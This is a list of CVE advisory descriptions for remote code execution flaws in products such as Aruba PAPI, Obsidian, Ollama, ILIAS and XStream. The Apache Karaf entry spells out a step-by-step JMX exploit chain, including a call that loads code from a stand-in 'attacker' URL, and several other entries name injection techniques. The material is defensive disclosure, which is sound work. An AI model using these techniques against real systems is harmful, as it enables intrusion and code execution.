CVSS v3.1 |
| There is a command injection vulnerability that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

| A path traversal vulnerability exists in Bower decompress-zip through version 0.3.3. The vulnerability located in `lib/decompress-zip.js` improperly validates archive entry paths during ZIP extraction. A crafted ZIP archive containing entries that resolve to prefix-sibling directories can cause files to be written outside the intended extraction directory. Successful exploitation may allow arbitrary file overwrite, application compromise, or remote code execution depending on the target environment and writable sibling paths. |
| Obsidian Desktop before 1.14.0 contains a remote code execution vulnerability that allows attackers to craft malicious Markdown notes exploiting insufficient sanitization of the data-background-iframe attribute, which bypasses DOMPurify and is processed by the bundled Reveal.js 4.3.1 within the Slides core plugin, allowing a javascript: URL to execute in the resulting background iframe. Because Node integration is enabled and context isolation is disabled in Obsidian's vault renderer, the injected script can call parent.require() to access Node APIs such as fs and child_process, enabling arbitrary operating system command execution when the victim opens the note and manually starts the presentation. |
| Budibase versions before 3.41.3 contain a remote code execution vulnerability in plugin handling that allows authenticated admin users to execute arbitrary code by uploading a malicious plugin tarball. The server calls eval() on plugin JavaScript files without sandboxing in the main Node.js process, enabling attackers to exfiltrate environment variables and credentials with root privileges in default deployments. |
| Ollama is vulnerable to path traversal in the `/api/pull` endpoint due to insufficient validation of layer digests by the `digestToPath` function. An unauthenticated remote attacker can specify a path traversal sequence as a layer digest, causing a malicious binary to be written outside the model store.
Critically if the server process has write access to `/usr/lib/ollama` (the default in most Ollama Docker images), an attacker can write the malicious file to that directory. On the next server restart, the file is loaded and executed, resulting in remote code execution as root.
This issue was fixed in version 0.35.0. |
| mJobTime through build 15.7.3.32 contains an unauthenticated SQL execution vulnerability in the Login.aspx admin panel handlers, where the runQueryButton postback and exportSqlQuery_Server PageMethod execute caller-supplied SQL against the backing Sybase SQL Anywhere database using DBA/sysadmin privileges with no server-side authentication enforced beyond a client-side sessionStorage flag. Attackers can submit arbitrary SQL through these exposed endpoints to invoke xp_cmdshell and xp_read_file, achieving pre-authentication remote code execution as LocalSystem via a single HTTP request. |
| ILIAS before 9.24, 10.x before 10.12 and 11.x before 11.5 contains an argument injection vulnerability in assImagemapQuestionGUI that allows question authors to inject ImageMagick convert options via uploaded image filenames. Attackers can embed tab-separated options, which escapeshellcmd() does not neutralise, to write a PHP file under the web root and achieve remote code execution. |
| A heap buffer overflow flaw was found in the SASL I/O layer of 389 Directory Server (389-ds-base). In sasl_io_start_packet(), the wrapped-record length read from the wire is validated only against an upper bound. A small wire length (0, 1, or 2) produces an encrypted_buffer_count below the already-consumed encrypted_buffer_offset, causing an unsigned subtraction underflow in sasl_io_read_packet(). PR_Recv is then requested to read approximately 4 GiB into a 1024-byte heap buffer, resulting in a heap buffer overflow with attacker-controlled content. After a successful SASL bind with integrity protection (SSF > 0), a remote authenticated attacker can cause a denial of service or potentially achieve remote code execution. This flaw is distinct from CVE-2026-11774, whose fix only guards against upper-bound overflow. |
| -A weakness could have allowed an authenticated Kiteworks Email Protection Gateway administrator to write a file outside its intended location and cause the application to execute it, potentially resulting in remote code execution as the underlying service account. |
| Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Remote Code Execution. Kiteworks Email Protection Gateway allowed an authenticated administrator to import configuration whose contents were not sufficiently validated before being processed. A crafted submission could potentially allow arbitrary commands to be executed on the affected gateway. |
| A flaw was found in Foreman. The foreman-rake initialization logic in /usr/share/foreman/config/settings.rb contains a vulnerable code pattern where configuration data is processed through two distinct executable layers. This creates a multi-stage execution chain that allows for both Server-Side Template Injection (SSTI) and insecure deserialization. This vulnerability can lead to remote code execution, total infrastructure compromise and supply chain risk. |
| The BackWPup WordPress plugin before 5.7.7 does not properly restrict the destination path of files extracted during a backup restore when its fallback archive library is used, allowing high-privileged users to write files outside the intended restore directory, potentially leading to remote code execution. |
| Foxit PDF Editor/Reader’s U3D/GIF texture decoding path contained insufficient validation of image dimensions and related size information. Under certain conditions, this could lead to an incorrectly sized memory allocation and a subsequent out-of-bounds write during pixel processing, potentially resulting in remote code execution. |
| When Brocade ASCG before 3.5.0 processes support bundle archives ingested from remote compromised endpoints, the application fails to sanitize path traversal sequences contained within archive entries prior to extraction. An unauthenticated remote attacker capable of sending or intercepting ingested archive files can leverage this flaw to write arbitrary files to restricted locations on the underlying host, potentially leading to remote code execution. |
| The Super Forms – Drag & Drop Form Builder plugin for WordPress is vulnerable to Unrestricted File Type Upload in all versions up to, and including, 6.3.316 via the upload_files function. This is due to missing file type validation in the upload_files function, which reads and applies an attacker-controlled extensions string from _super_elements post meta verbatim as the allowed MIME type map. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload files that may be executable, which makes remote code execution possible. The attack requires a preceding step: poisoning the _super_elements post meta via the super_save_form AJAX handler, which lacks a capability and nonce check but requires the attacker to be authenticated as at minimum a Subscriber-level user; the subsequent file upload via super_upload_files requires no authentication at all. |
| VMware vRealize Operations contains an information disclosure vulnerability. A low-privileged malicious actor with network access can create and leak hex dumps, leading to information disclosure. Successful exploitation can lead to a remote code execution. |
| Microsoft Photos App Remote Code Execution Vulnerability |
| Remote code execution vulnerabilities exist in the affected interface of HPE Networking ClearPass Policy Manager that could allow an authenticated remote attacker with high privileges to execute arbitrary code. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system. |
| Apache Karaf exposes a JMX MBeanServer guarded by KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in MBeanInvocationHandler#guarded:
private final List<String> guarded = Collections.unmodifiableList( Arrays.asList("invoke", "getAttribute", "getAttributes", "setAttribute", "setAttributes"));
The MBean lifecycle operations MBeanServer#createMBean, #registerMBean and #unregisterMBean are not in this list. Calls to these methods are forwarded directly to the underlying MBeanServer with no role check at all, regardless of the roles configured in etc/jmx.acl.*.cfg.
As a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged "viewer" role, can call createMBean() to instantiate an arbitrary class as a MBean, and unregisterMBean() to remove it again afterwards, with no authorization check and no audit log entry (logging in KarafMBeanServerGuard only occurs on the RBAC-denial path, which this bypass never reaches).
This is significant because javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way. MLet acts as a remote classloader: its getMBeansFromURL(URL) operation fetches an MLet text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through KarafMBeanServerGuard's existing "invoke" check, but the default etc/jmx.acl.cfg grants the "viewer" role to any method name matching the wildcard rule "get* = viewer", a heuristic intended for read-only getters. Because "getMBeansFromURL" happens to start with "get", it also matches that rule, so a default installation grants "viewer" callers permission to invoke it without any Karaf-specific ACL naming MLet at all. Combined with the createMBean gap, this gives a "viewer"-role JMX client a path to remote code execution to the Karaf JVM:
* Authenticate to JMX as any user with any role (e.g. "viewer").
* mbs.createMBean("javax.management.loading.MLet", objectName) is not in GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered.
* mbs.invoke(objectName, "getMBeansFromURL", new Object[]{"http://attacker/mlet.txt"}, ...) is guarded, but the method name matches the default "get* = viewer" ACL rule, so permitted.
* The remote .mlet file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM.
* mbs.unregisterMBean(objectName) can be used to remove the MLet afterwards, also not in GUARDED_OPERATIONS, no RBAC check, no audit trail.
The fix adds createMBean, registerMBean and unregisterMBean to the guarded operation list, resolves required roles for them from the jmx.acl* configuration by ObjectName and (for createMBean/registerMBean) MBean class name, and ships default etc/jmx.acl.cfg entries restricting all three operations to the "admin" role. This allows deployments to also write class-name-specific rule, e.g.:
createMBean(java.lang.String)[/javax\.management\.loading\..*/] = admin
Apache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-"admin" JMX credentiels. |
| XStream before version 1.4.14 is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14. |
